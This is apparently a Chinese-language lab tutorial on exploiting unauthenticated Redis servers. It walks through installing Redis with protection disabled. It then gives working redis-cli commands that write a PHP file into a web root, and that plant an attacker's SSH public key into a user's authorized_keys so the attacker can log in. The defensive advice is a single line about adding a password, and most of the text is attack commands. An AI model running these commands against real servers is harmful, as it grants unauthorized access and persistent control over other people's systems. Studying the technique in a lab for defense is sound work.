一、安装Redis

1、下载安装包

wget http://download.redis.io/releases/redis-3.2.0.tar.gz

2、解压安装包

tar xzf redis-3.2.0.tar.gz

3、安装

cd redis-3.2.0/
make      //编译的意思

二、配置Redis

1、修改配置文件redis.conf

bind 127.0.0.1前面加上#号      //绑定本地访问
protected-mode设置为no         //关闭保护模式

2、启动redis服务

cd src
./redis-server ../redis.conf

三、未授权连接

./redis-cli -h 192.168.88.87      //连接服务
CONFIG SET dir /var/www/html      //设置路径
set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"      //写入数据
CONFIG SET dbfilename phpinfo.php      //创建文件
save      //保存

四、防御措施

添加密码

修改配置文件redis.conf

五、未授权添加ssh密钥

1、探测目标是否存在Redis服务

2、测试Redis是否存在未授权访问

3、SSH密钥生成

ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > public.txt

4、上传密钥

cat public.txt | redis-cli -h 192.168.0.101 -x set x
redis-cli -h 192.168.0.101 config set dir "/home/user/.ssh/"
redis-cli -h 192.168.0.101 config set dbfilename authorized_keys
redis-cli -h 192.168.0.101 save

5、登陆ssh

ssh -l user -p 1322 -i id_rsa 192.168.0.101

Redis未授权访问

一、安装Redis

1、下载安装包

2、解压安装包

3、安装

二、配置Redis

1、修改配置文件redis.conf

2、启动redis服务

三、未授权连接

四、防御措施

添加密码

五、未授权添加ssh密钥

1、探测目标是否存在Redis服务

2、测试Redis是否存在未授权访问

3、SSH密钥生成

4、上传密钥

5、登陆ssh

推荐阅读